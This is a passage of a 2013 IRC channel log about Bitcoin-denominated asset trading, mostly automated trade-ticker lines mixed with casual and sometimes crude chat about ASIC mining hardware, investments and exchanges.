0.0512 BTC [-] Jun 15 02:34:33 [BTCTC] [ASICMINER-PT] 3 @ 2.988 = 8.964 BTC [+] Jun 15 02:34:39 [BTCTC] [ASICMINER-PT] 1 @ 2.989 BTC [+] Jun 15 02:34:41 [BTCTC] [ASICMINER-PT] 1 @ 2.99 BTC [+] Jun 15 02:35:44 jcpham: thanks for letting me know on the hashpower domain Jun 15 02:35:47 its renewing atm. Jun 15 02:35:50 Pretty much shutting it down Jun 15 02:35:58 making it so users ccan withdraw any balance amount Jun 15 02:37:23 mircea_popescu: http://bitcoinmagazine.com/kenilworth-exploration-bitcoin-crowd-investing-meets-real-world-mining/ :) Jun 15 02:37:54 [BTCTC] [ASICMINER-PT] 1 @ 2.995 BTC [+] Jun 15 02:37:56 [BTCTC] [ASICMINER-PT] 1 @ 2.9954 BTC [+] Jun 15 02:37:57 [BTCTC] [ASICMINER-PT] 5 @ 2.9955 = 14.9775 BTC [+] Jun 15 02:38:06 [BTCTC] [ASICMINER-PT] 5 @ 2.996 = 14.98 BTC [+] Jun 15 02:38:09 [BTCTC] [ASICMINER-PT] 3 @ 2.997 = 8.991 BTC [+] Jun 15 02:38:15 [BTCTC] [ASICMINER-PT] 1 @ 2.997998 BTC [+] Jun 15 02:40:04 [BTCTC] [ASICMINER-PT] 10 @ 2.999 = 29.99 BTC [+] Jun 15 02:41:33 Ukto what of it ? Jun 15 02:42:46 ;;ticker Jun 15 02:42:46 BTCUSD ticker | Best bid: 100.50002, Best ask: 100.74000, Bid-ask spread: 0.23998, Last trade: 100.74000, 24 hour volume: 35776.00053586, 24 hour low: 97.10000, 24 hour high: 104.70000, 24 hour vwap: 100.68449 Jun 15 02:42:57 that kenil is sketchy Jun 15 02:43:12 mircea_popescu: MPEX had a mention. :) Jun 15 02:43:16 just wanted to shre Jun 15 02:43:22 it will be in the print version as well Jun 15 02:43:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.029892 = 0.0598 BTC [+] Jun 15 02:45:53 a cool Jun 15 02:46:25 http://www.predictcoins.com/ this is kinda cute but no btc involved ... ? Jun 15 02:46:38 why would i play Jun 15 02:46:45 [BTCTC] [TAT.ASICMINER] 20 @ 0.029899 = 0.598 BTC [+] Jun 15 02:46:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.029899 = 0.2392 BTC [+] Jun 15 02:47:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.029899 BTC [+] Jun 15 02:49:08 [BTCTC] [ASICMINER-PT] 1 @ 2.996 BTC [-] Jun 15 02:49:10 [BTCTC] [ASICMINER-PT] 1 @ 2.997 BTC [+] Jun 15 02:49:11 [BTCTC] [ASICMINER-PT] 2 @ 2.998 = 5.996 BTC [+] Jun 15 02:50:23 [BTCTC] [ASICMINER-PT] 1 @ 2.997 BTC [-] Jun 15 02:51:33 [BTCTC] [ASICMINER-PT] 1 @ 2.998 BTC [+] Jun 15 02:51:49 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [+] Jun 15 02:52:20 [BTCTC] [BASIC-MINING] 1 @ 0.705 BTC [-] Jun 15 02:52:46 [BTCTC] [TAT.ASICMINER] 20 @ 0.029899 = 0.598 BTC [+] Jun 15 02:53:10 [BTCTC] [TAT.ASICMINER] 11 @ 0.029899 = 0.3289 BTC [+] Jun 15 02:57:20 [BTCTC] [BTC-BOND] 5 @ 0.0098 = 0.049 BTC [+] Jun 15 02:57:21 [BTCTC] [BTC-BOND] 59 @ 0.00976 = 0.5758 BTC [-] Jun 15 02:58:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.0295 = 0.1475 BTC [-] Jun 15 02:58:38 [BTCTC] [TAT.ASICMINER] 16 @ 0.029899 = 0.4784 BTC [+] Jun 15 03:04:08 [BTCTC] [ASICMINER-PT] 1 @ 2.998 BTC [-] Jun 15 03:06:02 kakobrekla bored at work ? Jun 15 03:06:36 wouldnt know Jun 15 03:12:39 [BTCTC] [TAT.ASICMINER] 27 @ 0.0292 = 0.7884 BTC [-] Jun 15 03:14:02 [BTCTC] [ASICMINER-PT] 2 @ 2.998 = 5.996 BTC [-] Jun 15 03:14:04 [BTCTC] [ASICMINER-PT] 1 @ 2.998 BTC [-] Jun 15 03:15:16 BUH BUH BUH BBBBUBBLE BUTT https://www.youtube.com/watch?v=hR-NXv5Tma0 Jun 15 03:15:37 [BTCTC] [TAT.ASICMINER] 74 @ 0.02915 = 2.1571 BTC [-] Jun 15 03:24:44 interesting, kat.ph no longer loads Jun 15 03:27:11 [BTCTC] [ASICMINER-PT] 1 @ 2.998 BTC [-] Jun 15 03:27:14 http://torrentfreak.com/kickasstorrents-domain-seized-after-music-industry-complaint-130614/ Jun 15 03:28:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.02989 = 0.1495 BTC [+] Jun 15 03:30:13 [BTCTC] [TAT.ASICMINER] 23 @ 0.029897 = 0.6876 BTC [+] Jun 15 03:30:24 [BTCTC] [ASICMINER-PT] 10 @ 2.99 = 29.9 BTC [-] Jun 15 03:35:59 mircea, are you here? Jun 15 03:47:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.029896 BTC [-] Jun 15 03:48:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.029896 = 0.4185 BTC [-] Jun 15 03:48:56 [BTCTC] [ESECURITYSABTC] 1 @ 0.25 BTC [+] Jun 15 03:51:55 [HAVELOCK] [SDICE] 8 @ 0.191 = 1.528 BTC [-] Jun 15 03:54:42 [HAVELOCK] [SDICE] 10 @ 0.19 = 1.9 BTC [-] Jun 15 03:57:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.029896 = 1.4948 BTC [-] Jun 15 03:58:27 yeah Jun 15 03:58:40 ;;later tell wences sup Jun 15 03:58:41 The operation succeeded. Jun 15 04:06:29 that later thingy... Jun 15 04:06:42 its kinda lame Jun 15 04:07:05 cause nobody uses gribbe auth if no deal Jun 15 04:09:49 furuknap is on fire tonite Jun 15 04:29:45 but you don't need to gribvble aut Jun 15 04:34:44 [BTCTC] [TAT.ASICMINER] 13 @ 0.029896 = 0.3886 BTC [-] Jun 15 04:35:27 you need to do some auth Jun 15 04:35:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.029897 = 0.299 BTC [+] Jun 15 04:37:10 [BTCTC] [TAT.ASICMINER] 32 @ 0.029899 = 0.9568 BTC [+] Jun 15 04:37:18 [BTCTC] [DMS.MINING] 30 @ 0.03 = 0.9 BTC [-] Jun 15 04:42:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.029899 = 0.0897 BTC [+] Jun 15 04:48:27 [BTCTC] [TAT.ASICMINER] 7 @ 0.029899 = 0.2093 BTC [+] Jun 15 04:52:05 [BTCTC] [ASICMINER-PT] 1 @ 2.987 BTC [-] Jun 15 04:52:14 [HAVELOCK] [SDICE] 3 @ 0.1880001 = 0.564 BTC [-] Jun 15 04:52:15 [HAVELOCK] [SDICE] 3 @ 0.188 = 0.564 BTC [-] Jun 15 04:52:17 [HAVELOCK] [SDICE] 4 @ 0.187 = 0.748 BTC [-] Jun 15 04:53:16 [HAVELOCK] [SDICE] 8 @ 0.187 = 1.496 BTC [-] Jun 15 04:53:17 [HAVELOCK] [SDICE] 2 @ 0.186 = 0.372 BTC [-] Jun 15 04:55:52 nope Jun 15 04:57:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.0297 = 0.0891 BTC [-] Jun 15 04:57:48 [BTCTC] [ASICMINER-PT] 1 @ 2.987 BTC [-] Jun 15 05:01:45 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00699 = 0.3495 BTC [-] Jun 15 05:02:02 nickserv then Jun 15 05:02:05 something Jun 15 05:02:46 i know i always get them a week late Jun 15 05:08:11 lol Jun 15 05:08:23 ;;later tell kakobrekla hi Jun 15 05:08:23 The operation succeeded. Jun 15 05:08:26 now say something Jun 15 05:08:53 im usually quiet Jun 15 05:08:55 [HAVELOCK] [ASICM] 25 @ 0.02942499 = 0.7356 BTC [+] Jun 15 05:09:11 yea Jun 15 05:09:23 ok Jun 15 05:09:34 works for trolls Jun 15 05:10:20 but not for hermits Jun 15 05:16:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.029888 = 0.7472 BTC [+] Jun 15 05:16:41 [BTCTC] [CRYPTO-TRADE] 6 @ 0.120471 = 0.7228 BTC [-] Jun 15 05:16:43 [BTCTC] [CRYPTO-TRADE] 1 @ 0.12047 BTC [-] Jun 15 05:16:45 [BTCTC] [CRYPTO-TRADE] 1 @ 0.120351 BTC [-] Jun 15 05:18:10 [BTCTC] [CRYPTO-TRADE] 2 @ 0.120352 = 0.2407 BTC [+] Jun 15 05:18:55 [HAVELOCK] [VTX] 2 @ 0.5 = 1 BTC [+] Jun 15 05:19:42 [HAVELOCK] [ASICM] 35 @ 0.02942499 = 1.0299 BTC [+] Jun 15 05:20:23 [BTCTC] [BASIC-MINING] 3 @ 0.7 = 2.1 BTC [-] Jun 15 05:26:05 [HAVELOCK] [ASICM] 3 @ 0.02949499 = 0.0885 BTC [+] Jun 15 05:30:47 [HAVELOCK] [ASICM] 3 @ 0.02949499 = 0.0885 BTC [+] Jun 15 05:30:48 [HAVELOCK] [ASICM] 32 @ 0.02942499 = 0.9416 BTC [-] Jun 15 05:43:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.029888 = 0.0897 BTC [+] **** BEGIN LOGGING AT Sat Jun 15 13:15:42 2013 Jun 15 13:17:22 http://thenextweb.com/microsoft/2013/06/15/microsoft-joins-facebook-in-partial-fisa-disclosure-6-7000-requests-implicated-31-32000-accounts/?utm_source=feedly Jun 15 13:18:17 dayum that's a lot o' terrorists. Jun 15 13:19:12 here's something pretty much nobody else would likely know : when the widely impopular, utterly illegal, russian-sponsored communist regime collapsed in Romania, the respective african tyrant (ceausescu, good friends with idi amin and the zaire guy etc) Jun 15 13:19:24 came out on TV explaining that "the country is being destabilised" by "terrorists" Jun 15 13:19:39 a months-long "terroristS" hunt ensued, Jun 15 13:19:53 and even to this day in romanian "terrorist" is short for "pig in a poke" Jun 15 13:29:38 [BTCTC] [DMS.MINING] 1 @ 0.0301 BTC [+] Jun 15 13:30:39 [HAVELOCK] [ASICM] 5 @ 0.02999899 = 0.15 BTC [+] Jun 15 13:30:41 [HAVELOCK] [ASICM] 4 @ 0.029999 = 0.12 BTC [+] Jun 15 13:30:41 [HAVELOCK] [ASICM] 2 @ 0.03 = 0.06 BTC [+] Jun 15 13:31:43 [BTCTC] [TAT.ASICMINER] 94 @ 0.0299 = 2.8106 BTC [+] Jun 15 13:35:48 [HAVELOCK] [ASICM] 1 @ 0.0297 BTC [-] Jun 15 13:43:59 [BTCTC] [BASIC-MINING] 1 @ 0.679302 BTC [+] Jun 15 13:44:17 [BTCTC] [BASIC-MINING] 9 @ 0.679301 = 6.1137 BTC [-] Jun 15 13:44:57 [BTCTC] [BASIC-MINING] 1 @ 0.6793 BTC [-] Jun 15 13:46:16 [BTCTC] [ASICMINER-PT] 1 @ 2.95 BTC [+] Jun 15 13:46:36 [BTCTC] [ASICMINER-PT] 1 @ 2.969989 BTC [+] Jun 15 13:47:00 [BTCTC] [ASICMINER-PT] 5 @ 2.96999 = 14.85 BTC [+] Jun 15 13:47:50 [BTCTC] [TAT.ASICMINER] 32 @ 0.0299 = 0.9568 BTC [+] Jun 15 14:03:52 [BTCTC] [ASICMINER-PT] 1 @ 2.930001 BTC [-] Jun 15 14:03:54 [BTCTC] [ASICMINER-PT] 1 @ 2.930001 BTC [-] Jun 15 14:03:56 [BTCTC] [ASICMINER-PT] 1 @ 2.93 BTC [-] Jun 15 14:03:56 [BTCTC] [ASICMINER-PT] 2 @ 2.9215 = 5.843 BTC [-] Jun 15 14:03:58 [BTCTC] [ASICMINER-PT] 1 @ 2.92 BTC [-] Jun 15 14:04:00 [BTCTC] [ASICMINER-PT] 1 @ 2.919 BTC [-] Jun 15 14:04:03 [BTCTC] [ASICMINER-PT] 1 @ 2.911 BTC [-] Jun 15 14:04:05 [BTCTC] [ASICMINER-PT] 1 @ 2.911 BTC [-] Jun 15 14:04:06 [BTCTC] [ASICMINER-PT] 2 @ 2.901 = 5.802 BTC [-] Jun 15 14:04:08 [BTCTC] [ASICMINER-PT] 1 @ 2.900001 BTC [-] Jun 15 14:04:11 [BTCTC] [ASICMINER-PT] 3 @ 2.9 = 8.7 BTC [-] Jun 15 14:04:17 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Jun 15 14:08:13 [BTCTC] [B.YABMC] 1 @ 0.011999 BTC [+] Jun 15 14:15:25 [BTCTC] [BTC-BOND] 4 @ 0.009994 = 0.04 BTC [+] Jun 15 14:16:38 [BTCTC] [RSM] 1 @ 0.012201 BTC [-] Jun 15 14:22:33 [HAVELOCK] [ASICM] 1 @ 0.0299999 BTC [+] Jun 15 14:22:49 [HAVELOCK] [SDICE] 8 @ 0.195 = 1.56 BTC [-] Jun 15 14:23:45 [HAVELOCK] [ASICM] 4 @ 0.0299999 = 0.12 BTC [+] Jun 15 14:23:56 [HAVELOCK] [ASICM] 189 @ 0.03 = 5.67 BTC [+] Jun 15 14:24:19 [HAVELOCK] [ASICM] 200 @ 0.03 = 6 BTC [+] Jun 15 14:24:41 [HAVELOCK] [ASICM] 250 @ 0.03 = 7.5 BTC [+] Jun 15 14:34:55 ;;next Jun 15 14:34:55 expecting re-test of 88 | lower targets: 80-77, 67-72 | resistance: 102, 105-107, 110 | support: 92-94 | #bitcoin [Fri, 14 Jun 2013 04:21:56 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 1 day, 7 hours, 12 minutes, and 58 seconds ago Jun 15 14:38:10 [HAVELOCK] [ASICM] 6 @ 0.0325 = 0.195 BTC [+] Jun 15 14:44:47 [HAVELOCK] [ASICM] 900 @ 0.03245 = 29.205 BTC [-] Jun 15 14:45:13 [HAVELOCK] [ASICM] 180 @ 0.03245 = 5.841 BTC [-] Jun 15 14:45:35 [HAVELOCK] [SDICE] 30 @ 0.19 = 5.7 BTC [-] Jun 15 14:45:45 [HAVELOCK] [SDICE] 4 @ 0.1899 = 0.7596 BTC [-] Jun 15 14:46:05 Chaang-Noi: Dump it while you can! Jun 15 14:46:23 Gonna become the next S.DICE Jun 15 14:47:01 [HAVELOCK] [ASICM] 200 @ 0.03245 = 6.49 BTC [-] Jun 15 14:49:04 Yeah wait for some stabilization then sell Jun 15 14:49:54 Do they have plans to add more hashrate? Or are they waiting for others to add some before they add more? I've not been following it closely. Jun 15 14:52:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0298 BTC [-] Jun 15 14:53:38 They have 100TH batch on the way Jun 15 14:53:46 and another 100TH after that Jun 15 14:53:56 my guess is they only put enough in their farm Jun 15 14:54:07 to equal < 50% if the largest pool died Jun 15 14:54:33 currently around 20-25% of nethash seems to be their goal Jun 15 14:58:00 [BTCTC] [ASICMINER-PT] 1 @ 2.968869 BTC [+] Jun 15 15:01:04 ;;estimate Jun 15 15:01:06 Next difficulty estimate | 19236398.8761 based on data since last change | 20010508.6522 based on data for last three days Jun 15 15:01:08 ;;bc,stats Jun 15 15:01:09 Current Blocks: 241659 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 260 blocks | Next Difficulty In About: 1 day, 10 hours, 40 minutes, and 0 seconds | Next Difficulty Estimate: 19236398.8761 | Estimated Percent Change: 23.26574 Jun 15 15:02:38 [BTCTC] [ASICMINER-PT] 3 @ 2.9 = 8.7 BTC [-] Jun 15 15:02:38 ThickAsThieves: Thanks. What's happening with Avalon, BFL and the others? Anyone else actually delivering much? Jun 15 15:03:13 lol nvidia Jun 15 15:03:36 avalon sold a LOT of chips Jun 15 15:03:46 geforce 800 series, maxwell, will have an onboard arm to offload instruction processing from the driver Jun 15 15:03:48 but afaik has only delivered some test batches Jun 15 15:04:09 ThickAsThieves: batches implies plural of batch, batch implies more than 1. Jun 15 15:04:36 thank you for the important distinction Jun 15 15:04:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.007 BTC [+] Jun 15 15:04:44 BFL is slowly fulfilling their backlog Jun 15 15:04:52 only jalepenos so far Jun 15 15:04:57 yes, at 1 unit every few years Jun 15 15:05:01 but soon the next size up Jun 15 15:05:15 by the time BFL ships their shitty 65nm chips, if ever Jun 15 15:05:24 their are a few other manufacturers people are paying attention to Jun 15 15:05:25 everyone else will have already shipped 28nm Jun 15 15:05:34 KnC seems to be promising Jun 15 15:05:41 they had a demo unit working Jun 15 15:05:46 I dont know if I should preorder from knc Jun 15 15:05:48 seems scammy Jun 15 15:05:50 but they scrapped it to go smaller nano Jun 15 15:06:09 imo dont order shit til it actually exists Jun 15 15:06:18 well, they dont want money up front Jun 15 15:06:24 so I just wont pay if it comes out they dont exist Jun 15 15:06:31 word Jun 15 15:06:59 lol. interesting. Jun 15 15:07:14 right now, it is in every miner manufacturers' best interest to just shut up and work Jun 15 15:07:33 competition is so stiff that the element of surprise seems important Jun 15 15:07:56 in reality, AM is the only one shipping Jun 15 15:08:06 and they are sold out of blades for a few weeks Jun 15 15:08:20 some distributors still have some th Jun 15 15:08:21 tho Jun 15 15:08:46 ;;ticker Jun 15 15:08:47 BTCUSD ticker | Best bid: 102.75000, Best ask: 103.38150, Bid-ask spread: 0.63150, Last trade: 102.90000, 24 hour volume: 29149.80492299, 24 hour low: 97.50000, 24 hour high: 103.70000, 24 hour vwap: 100.24703 Jun 15 15:08:51 ThickAsThieves: How much hashpower in terms of TH/s will be brought on line each week do you think for the next month? Jun 15 15:08:59 ;;calc 6995 / 102.75 Jun 15 15:08:59 68.0778588808 Jun 15 15:09:09 so their 350gh model is 68 btc Jun 15 15:09:35 i think the next couple weeks might be less of an increase than recently Jun 15 15:09:38 but Jun 15 15:09:50 after that back to 20%+ per diff Jun 15 15:10:02 Right Jun 15 15:11:13 why mine when you can buy TAT.VM! ;) Jun 15 15:12:12 ThickAsThieves: because depending on what the diff is in september, this box can pay for itself 2x Jun 15 15:12:18 and then just keep mining forever Jun 15 15:12:57 while i agree Jun 15 15:13:05 it actually would be interesting to track it Jun 15 15:13:18 to see how much tat.vm depreciates by then Jun 15 15:13:28 and what reinvesting the dailies would get you Jun 15 15:14:01 ThickAsThieves: Im investing my money in DMC 2.0 Jun 15 15:14:09 AM just cant make a big enough return imo Jun 15 15:14:22 oh please do put your money in something new and useful Jun 15 15:14:29 i'm just thinking out loud Jun 15 15:16:03 is there a word for people that go into an official asset thread and tell people to buy something else Jun 15 15:16:18 they at least deserve a slap Jun 15 15:16:23 Yeah, AM investor Jun 15 15:16:55 on one hand the logic in me says yeah sure you have a point Jun 15 15:17:05 but do you really need to come shit on my doorstep? Jun 15 15:18:45 ThickAsThieves: and remember, dude, DMC 1.0 was a very big AM invetsor early on Jun 15 15:18:52 so its not like I didnt help =P Jun 15 15:19:28 then thank you! Jun 15 15:19:30 :) Jun 15 15:19:54 [BTCTC] [ASICMINER-PT] 5 @ 2.9 = 14.5 BTC [-] Jun 15 15:20:01 i sold like 15 AM shares for 3.245 this morning Jun 15 15:20:05 cray Jun 15 15:20:12 I think someone did the math, and DMC was like the 12th largest investor Jun 15 15:20:45 I actually wish I had invested more Jun 15 15:21:52 i think everyone does Jun 15 15:21:59 yeah, but I actually had a chance to Jun 15 15:22:52 after nefario unlocked my glbse account, I had 1015 BTC Jun 15 15:23:10 am was still at IPO prices at the time Jun 15 15:23:30 that could have been 10k more shares Jun 15 15:23:44 making DMC the largest AM investor Jun 15 15:24:11 we've all missed many great opportunities in bitcoin Jun 15 15:24:16 but yes Jun 15 15:24:19 that's sad Jun 15 15:24:26 instead, I bought back 9330 DMC shares Jun 15 15:24:32 or a little under half of DMC Jun 15 15:25:36 [BTCTC] [ASICMINER-PT] 24 @ 2.94 = 70.56 BTC [+] Jun 15 15:26:34 i'm at 5000+ AM shares now, including personal ones and ones tied to the TAT assets Jun 15 15:26:53 DMC had 1000, have been wittling it down with trades Jun 15 15:29:47 0-day news: http://bitcoinviews.com/firmcoins-a-new-kind-of-bitcoin-physical-bill-ready-for-off-line-transactions/ Jun 15 15:31:03 nice Jun 15 15:33:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.02982 BTC [+] Jun 15 15:38:00 [BTCTC] [DMS.MINING] 7 @ 0.02998 = 0.2099 BTC [-] Jun 15 15:38:03 [BTCTC] [DMS.MINING] 16 @ 0.028101 = 0.4496 BTC [-] Jun 15 15:39:41 [BTCTC] [TAT.VIRTUALMINE] 140 @ 0.007 = 0.98 BTC [+] Jun 15 15:43:04 hey guys! what do you say about this? https://bitcointalk.org/index.php?topic=222746.20 Worth thinking about an investment? Jun 15 15:43:20 prolly no Jun 15 15:43:50 [BTCTC] [TAT.ASICMINER] 38 @ 0.0298 = 1.1324 BTC [-] Jun 15 15:44:02 [BTCTC] [ASICMINER-PT] 1 @ 2.93 BTC [-] Jun 15 15:44:06 why? Jun 15 15:44:31 [BTCTC] [DMS.SELLING] 23 @ 0.038953 = 0.8959 BTC [+] Jun 15 15:44:33 cause they are not bitcoin denominated Jun 15 15:44:41 and you will end up with eskimo bob type of asset Jun 15 15:45:07 worth now a pizza and a beer if you are luck Jun 15 15:45:08 because none of us know jack shit about IRL mining Jun 15 15:45:08 y Jun 15 15:45:18 fuck is "opertunity" Jun 15 15:45:58 it's a fancy word for scam Jun 15 15:46:06 operator- opportunity Jun 15 15:46:11 opertunity! Jun 15 15:46:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.029302 = 1.4651 BTC [-] Jun 15 15:48:07 because none of us know jack shit about IRL mining! Thats my biggest concern about this Jun 15 15:48:36 [BTCTC] [TAT.VIRTUALMINE] 210 @ 0.007 = 1.47 BTC [+] Jun 15 15:53:35 [HAVELOCK] [ASICM] 6 @ 0.03 = 0.18 BTC [-] Jun 15 15:53:49 [HAVELOCK] [ASICM] 1 @ 0.03235 BTC [+] Jun 15 15:59:38 [BTCTC] [MININGCO.ETF] 3 @ 0.8 = 2.4 BTC [-] Jun 15 16:03:10 [BTCTC] [BITVPS] 95 @ 0.000707 = 0.0672 BTC [+] Jun 15 16:03:14 [BTCTC] [BITVPS] 5 @ 0.000707 = 0.0035 BTC [+] Jun 15 16:04:55 [BTCTC] [RSM] 2 @ 0.014 = 0.028 BTC [+] Jun 15 16:14:04 [HAVELOCK] [ASICM] 20 @ 0.03 = 0.6 BTC [-] Jun 15 16:23:48 [BTCTC] [ASICMINER-PT] 1 @ 2.892101 BTC [-] Jun 15 16:24:19 ofc Jun 15 16:24:56 Chaang-Noi, AM is sold out of blades at the moment Jun 15 16:25:05 [BTCTC] [ASICMINER-PT] 1 @ 2.8921 BTC [-] Jun 15 16:25:53 lemme get a link for you Jun 15 16:26:48 https://bitcointalk.org/index.php?topic=99497.msg2460719#msg2460719 Jun 15 16:27:30 np Jun 15 16:27:41 oh yeah one more Jun 15 16:28:02 https://bitcointalk.org/index.php?topic=204030.msg2470634#msg2470634 Jun 15 16:28:11 [HAVELOCK] [ASICM] 6 @ 0.030001 = 0.18 BTC [+] Jun 15 16:29:31 [MPEX] [S.MPOE] 6870 @ 0.00070519 = 4.8447 BTC [-] Jun 15 16:29:37 it's not like there are any other stocks worth buying Jun 15 16:29:51 generally speaking Jun 15 16:31:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.0297 = 0.1188 BTC [+] Jun 15 16:31:26 [BTCTC] [TAT.ASICMINER] 11 @ 0.029302 = 0.3223 BTC [-] Jun 15 16:32:00 [BTCTC] [TAT.ASICMINER] 28 @ 0.029301 = 0.8204 BTC [-] Jun 15 16:32:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.0292 = 0.146 BTC [-] Jun 15 16:32:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.029142 = 0.0583 BTC [-] Jun 15 16:33:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.02914 = 0.2623 BTC [-] Jun 15 16:33:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.02915 = 0.4373 BTC [+] Jun 15 16:33:54 [BTCTC] [TAT.ASICMINER] 35 @ 0.029121 = 1.0192 BTC [-] Jun 15 16:34:48 BTCT.co: "Warning -- Withdrawal to addresses other than those you own personally is against site policy." Jun 15 16:34:49 kinda weird Jun 15 16:35:20 what's it for? Jun 15 16:35:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.029121 = 0.4368 BTC [-] Jun 15 16:35:41 [BTCTC] [TAT.ASICMINER] 100 @ 0.02911 = 2.911 BTC [-] Jun 15 16:35:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02911 BTC [-] Jun 15 16:35:44 ah Jun 15 16:35:46 [BTCTC] [TAT.ASICMINER] 99 @ 0.029 = 2.871 BTC [-] Jun 15 16:38:37 he also added this: Jun 15 16:38:41 "Warning -- The site uses a shared wallet. Withdrawals WILL NOT appear to come from your deposit address! This means winnings from online gambling sites will likely go into the site's wallet. Such deposits WILL BE CONFISCATED." Jun 15 16:38:57 not sure if that one as quite as smart Jun 15 16:39:06 confiscating things n all Jun 15 16:39:10 that is also smart but they are still idiots Jun 15 16:39:25 btc.sx? Jun 15 16:39:34 ah no Jun 15 16:39:42 you talking about other site Jun 15 16:39:47 nevermind then Jun 15 16:40:22 gaystamp took out codes too Jun 15 16:40:26 replaced them with ripple Jun 15 16:40:28 yay Jun 15 16:40:33 im not touching that shit Jun 15 16:41:07 srs Jun 15 16:41:17 they said "ripple is much better with this, we are taking out codes" Jun 15 16:41:38 ripple still seems to be gaining traction Jun 15 16:41:45 maybe i solf too early Jun 15 16:41:48 sold* Jun 15 16:42:16 yes VagCoin was also gaining traction for a while Jun 15 16:42:41 DeadTerra got a job at OpenCoin Jun 15 16:42:48 O_O Jun 15 16:43:13 [05:38] I am working for OpenCoin and then a swedish fixed exchanged called btcx.se :) Jun 15 16:43:28 lol Jun 15 16:43:42 he is known not to know how to select his partners Jun 15 16:43:55 i wonder how many STD he has Jun 15 16:44:02 hehe Jun 15 16:44:11 better not to use those services. Jun 15 16:44:33 i wonder they are paying Jun 15 16:44:42 surely he makes decent money trading Jun 15 16:44:49 a billion rpc per day Jun 15 16:44:51 xrp Jun 15 16:44:55 lol rpc Jun 15 16:45:04 i was like "ripplecoin" Jun 15 16:45:20 maybe someone should make that Jun 15 16:45:27 to get in front Jun 15 16:45:36 could be a nice scam Jun 15 16:45:38 who gives a shit Jun 15 16:47:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0298 BTC [+] Jun 15 16:51:17 https://bitcointalk.org/index.php?topic=5441.msg2482863#msg2482863 Jun 15 16:51:27 am I the only one that sees the stupidity here Jun 15 16:52:49 im a lone wolf in the forums these days Jun 15 16:53:23 you seem to hang in threads that are completely out of my radar Jun 15 16:53:34 eu stuff i guess Jun 15 16:53:52 i dunno i just want a good exchange Jun 15 16:53:59 and EVERYTHING that is happening is WRONG Jun 15 16:54:02 and STUPID Jun 15 16:54:06 and IDIOTS Jun 15 16:54:10 skateboards. Jun 15 16:54:36 yes but then in a cunt Jun 15 16:54:43 "i tried so therfore you cant critisize me" Jun 15 16:54:55 in a cunt = im a cunt Jun 15 16:54:59 got so pissed cant type anymore Jun 15 16:56:05 o look Jun 15 16:56:10 mjr_ is there on the pic Jun 15 16:56:18 and he didnt shave. Jun 15 16:56:22 high five Jun 15 16:56:51 http://googleblog.blogspot.com/2013/06/introducing-project-loon.html Jun 15 16:57:22 first comment: "April 1st? No, just another day at Google X..." Jun 15 16:57:59 loool Jun 15 16:58:00 and then taaki Jun 15 16:58:06 http://im.ft-static.com/content/images/222eb3a6-d3d4-11e2-95d4-00144feab7de.img Jun 15 16:58:08 srs Jun 15 16:58:19 i cut my own hair for years now... and i never leave a mess like that Jun 15 16:59:00 you can see all of taaki's dandruff on the HQ floor Jun 15 16:59:49 i have no idea Jun 15 17:00:08 LAO Jun 15 17:00:12 LMAO Jun 15 17:11:39 ;) Jun 15 17:13:29 [HAVELOCK] [SDICE] 9 @ 0.191 = 1.719 BTC [+] Jun 15 17:13:53 wtf Jun 15 17:14:03 "they have beautiful women follow them wherever they go, they are well dressed." Jun 15 17:14:09 what the hell kind of comment is that Jun 15 17:14:41 lol Jun 15 17:15:14 [HAVELOCK] [SDICE] 13 @ 0.1901 = 2.4713 BTC [-] Jun 15 17:15:56 you computer guys all look the same Jun 15 17:16:09 also Jun 15 17:16:16 whats a computer guy Jun 15 17:16:22 Chaang-Noi: she wanted the dick Jun 15 17:16:24 havent we moved on? Jun 15 17:16:38 when i say computer guy, it's like saying plumber Jun 15 17:16:48 the guy the fixes your porn malware Jun 15 17:18:34 presumably thai chicks are old-fashioned and see weight as a sign of success Jun 15 17:18:56 maybe you were too skinny Jun 15 17:20:05 Chaang-Noi: wedding ring, for some reason, can be attractive Jun 15 17:20:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.029797 = 0.2086 BTC [-] Jun 15 17:21:29 married man at a rave, maybe they are kinky Jun 15 17:23:25 [HAVELOCK] [ASICM] 1 @ 0.0319 BTC [+] Jun 15 17:23:41 [HAVELOCK] [ASICM] 1 @ 0.0319 BTC [+] Jun 15 17:25:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.029797 = 0.298 BTC [-] Jun 15 17:27:31 [BTCTC] [ASICMINER-PT] 1 @ 2.938899 BTC [+] Jun 15 17:28:18 [BTCTC] [TAT.ASICMINER] 33 @ 0.029797 = 0.9833 BTC [-] Jun 15 17:31:33 [HAVELOCK] [ASICM] 155 @ 0.0301 = 4.6655 BTC [-] Jun 15 17:31:34 [HAVELOCK] [ASICM] 1 @ 0.0300001 BTC [-] Jun 15 17:31:34 [HAVELOCK] [ASICM] 7 @ 0.03 = 0.21 